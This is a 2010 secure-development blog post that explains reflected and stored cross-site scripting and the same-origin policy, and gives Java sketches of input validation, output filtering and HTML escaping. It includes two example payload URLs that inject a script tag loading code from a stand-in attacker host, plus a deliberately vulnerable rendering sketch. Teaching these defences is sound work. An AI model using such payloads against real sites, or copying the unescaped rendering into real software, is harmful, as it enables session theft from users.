Secure Development - Cross-Site Scripting (XSS)

Feb 19 2010

Originally, this week's post was supposed to cover both Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF), but I quickly realized that each of these topics alone is more than enough to fill a blog entry. These two are some of the most common and dangerous web application attacks, and at first glance, it may be hard to tell the difference. Here is an easy way to distinguish them: XSS involves injecting content into an existing page, while CSRF involves taking unauthorized actions on behalf of a logged-on user. XSS can be used (and often is) to launch CSRF attacks, but they are two separate attack modes.

There are two categories of XSS attacks: 1) stored (persistent) and 2) reflected. Persistent XSS attacks are farther-reaching since the malicious code only needs to be injected once and then gets stored, usually in a back-end database. From there, it can potentially reach thousands of users who visit the site. A reflected XSS attack is no less powerful (it produces the same end result in the victim's browser), but it can typically target only one user at a time. Often, this is done by e-mailing or instant messaging the victim a specially crafted link (usually to a legitimate site) that has the malicious code embedded. The following Google link is an example of a reflected XSS attack. It would inject malicious code when the user views the results page (don't worry, this doesn't actually work--Google properly escapes the special characters; see Output Encoding below):

http://www.google.com/search?q=test<script src="http://mal.icio.us/payload.js"></script>
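To see why a link like the one above would be dangerous against a site that does not escape its output, here is a minimal sketch of a naive results page. The class and method names are hypothetical and this is not how Google (or any particular site) builds its pages; it only illustrates the vulnerable pattern of pasting a request parameter straight into HTML.

```java
// Hypothetical sketch of a vulnerable results page; all names are illustrative.
final class ReflectedXssSketch {

    // Builds the page by concatenating the raw query into the markup.
    // Nothing is escaped, so any HTML in the query becomes part of the page.
    static String renderResultsUnsafe(String query) {
        return "<html><body><p>Results for: " + query + "</p></body></html>";
    }

    public static void main(String[] args) {
        // The value of the q parameter from the example link.
        String query = "test<script src=\"http://mal.icio.us/payload.js\"></script>";
        String page = renderResultsUnsafe(query);

        // The attacker's script tag is reflected back verbatim, so the
        // victim's browser would fetch and run payload.js.
        System.out.println(page);
        System.out.println("Script tag reflected: " + page.contains("<script src="));
    }
}
```

The attacker never touches the server here. The payload travels in the link, and the server simply echoes it back to whoever clicks.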

Next, let's look at an example of a persistent XSS attack, where the attacker posts a normal-looking comment ("cool") followed by some JavaScript pointing to code hosted on a web server that is controlled by the attacker.

http://forum.com/postComment?comment=cool<script src="http://mal.icio.us/payload.js"></script>

Assuming this is posted to a message board or forum, the injected JavaScript will execute each time a user later loads the page. Keep in mind that JavaScript executes inside the user's browser, though it is limited by the same-origin policy. This policy states that JavaScript originating from web site A cannot access any cookies or other data stored by web site B. However, an XSS attack overcomes this limitation since the injected code seems to originate from the legitimate website (forum.com), leaving it free to steal the user's forum.com session cookies, which would allow an attacker or automated script to impersonate the user.
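The same-origin comparison described above can be sketched roughly as follows. This is a simplified illustration, assuming absolute http or https URLs and the usual definition of an origin as scheme, host, and port; real browsers apply more detailed rules (cookies in particular have their own scoping), and the class and method names are hypothetical.

```java
import java.net.URI;

// Simplified sketch of an origin comparison; not a browser implementation.
final class SameOriginSketch {

    // Fill in the default port so http://forum.com and http://forum.com:80 match.
    static int effectivePort(URI uri) {
        if (uri.getPort() != -1) {
            return uri.getPort();
        }
        return "https".equalsIgnoreCase(uri.getScheme()) ? 443 : 80;
    }

    // Two URLs share an origin when scheme, host, and port all match.
    // Assumes both arguments are absolute URLs with a scheme and a host.
    static boolean sameOrigin(String a, String b) {
        URI ua = URI.create(a);
        URI ub = URI.create(b);
        return ua.getScheme().equalsIgnoreCase(ub.getScheme())
                && ua.getHost().equalsIgnoreCase(ub.getHost())
                && effectivePort(ua) == effectivePort(ub);
    }

    public static void main(String[] args) {
        // A page on the attacker's own site is a different origin from the forum.
        System.out.println(sameOrigin("http://forum.com/thread", "http://mal.icio.us/page.html"));
        // Two pages on the forum share an origin.
        System.out.println(sameOrigin("http://forum.com/thread", "http://forum.com/postComment"));
    }
}
```

The important detail is which URL the browser uses in this comparison: a script runs with the origin of the page that includes it, not the origin of the server hosting the script file. That is why payload.js, although served from mal.icio.us, runs as forum.com once its script tag has been injected into a forum.com page.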

Any other features supported by JavaScript (including the ability to partially read the user's browsing history) are fully available to the injected code. From this vantage point, the attacker can launch any number of insidious attacks, including exploiting bugs in the browser or any of the add-on technologies (e.g., JavaScript, ActiveX, Flash, PDF) to break out of the browser sandbox and gain full user-level access to the user's PC (or worse if the user is logged in on a privileged account, as is the case with many Windows XP users).

However, in some cases attackers don't even need to break out of the JavaScript sandbox to achieve their goals. Entire botnets have been implemented running only on JavaScript inside the victims' browsers. For most bots, the two most important resources are CPU time and network connectivity, both of which are freely available to any JavaScript code. For a good proof-of-concept example, see XSS-Proxy and also check out the story of Jikto, a security researcher's proof-of-concept JavaScript bot implementation that was accidentally leaked at ShmooCon 2007.

The attacker can even alter the HTML content of the web pages being displayed. The implications of this are significant, especially in the context of financial websites. For example, attackers can initiate transactions on behalf of the user (via CSRF, more on this next week) and then hide these transactions by altering the HTML returned by the web server when the user checks their transaction history. In September 2009, the URLzone banking Trojan was observed covering its tracks in this way, though it used browser hooking instead of XSS.

While XSS vulnerabilities can lead to some very complex and dangerous attacks, developers can prevent most of them with just three countermeasures (where possible, use all three combined):

  1. Input Validation: I hate to keep harping on this, but as I mentioned in my first post, poor input validation is at the root of a large number of security-related code problems. Whitelist-only input validation works well in most cases where the input is well-formed.
  2. Output Filtering: In cases where the input can legitimately contain special characters related to HTML and JavaScript, you may still be able to safely strip out unexpected characters when you are outputting the result. As with input validation, a default-deny whitelisting approach works best, with regular expressions to simplify string matching.
  3. Output Encoding: There are some cases where both the input and output can legitimately contain pretty much any type of character (such as Google searches). In these cases, neither input nor output filtering is feasible, so the best approach is escaping or encoding all special characters in the output. Specifically, all HTML special characters should be translated to their HTML entities: < becomes &lt;, ) becomes &#41;, and so on. In Java, you can use HTMLEncode or JSTL c:out for output encoding.
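As a rough illustration of the three countermeasures listed above, here is a minimal sketch in plain Java. The class name, method names, the username rule, and the set of allowed output characters are all assumptions made for this example; in a real application you would more likely rely on a maintained encoding library or on JSTL c:out rather than hand-rolled code like this.

```java
import java.util.regex.Pattern;

// Hypothetical sketch of the three countermeasures; names and rules are illustrative.
final class XssCountermeasuresSketch {

    // 1. Input validation: accept only input matching a whitelist pattern.
    // Assumed rule: a username is 3 to 20 letters, digits, or underscores.
    private static final Pattern USERNAME = Pattern.compile("[A-Za-z0-9_]{3,20}");

    static boolean isValidUsername(String input) {
        return input != null && USERNAME.matcher(input).matches();
    }

    // 2. Output filtering: default-deny, strip anything not explicitly allowed.
    // Assumed whitelist: letters, digits, spaces, and basic punctuation.
    private static final Pattern NOT_ALLOWED = Pattern.compile("[^A-Za-z0-9 .,!?'-]");

    static String filterOutput(String text) {
        return NOT_ALLOWED.matcher(text).replaceAll("");
    }

    // 3. Output encoding: keep every character, but translate the HTML
    // special characters into entities so the browser treats them as text.
    static String escapeHtml(String text) {
        StringBuilder out = new StringBuilder(text.length() + 16);
        for (int i = 0; i < text.length(); i++) {
            char c = text.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                case '(':  out.append("&#40;");  break;
                case ')':  out.append("&#41;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) {
        String payload = "cool<script src=\"http://mal.icio.us/payload.js\"></script>";
        System.out.println(isValidUsername(payload)); // rejected by the whitelist
        System.out.println(filterOutput(payload));    // markup characters stripped
        System.out.println(escapeHtml(payload));      // markup characters encoded
    }
}
```

Note the trade-off between the last two: filtering destroys part of what the user typed, while encoding preserves it and only changes how the browser interprets it. The entity encoding shown here targets HTML body text and quoted attribute values; data written into other contexts, such as inside a script block or a URL, needs encoding appropriate to that context.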

In fact, these are pretty much the only types of countermeasures that developers have available, mainly because once an attacker has injected malicious code into a site, the majority of the actions the attacker can take are actually available by design: trusted JavaScript is supposed to be able to read cookies, initiate network connections on behalf of the user (e.g., AJAX), etc. In other words, your defenses should be focused on keeping malicious JavaScript out of the pages your web server delivers, because once it gets in, it's basically Game Over.

Next week, we'll talk about XSS's evil twin, Cross-Site Request Forgery (CSRF).

About the Author

Daniel is a business and technical systems analyst with a background in IT security and software development. He has four years of experience in the IT security field, including published academic research. His main areas of expertise include secure development, network security, and authentication. In addition to security, Daniel has a software development background in languages such as Java, PHP, SQL, and Perl. He also has over 12 years of experience working with and administering various versions of Linux and related open-source software.

Disclaimer

The words and opinions expressed here are those of each article's respective author, and do not necessarily represent the views of CapTech Ventures.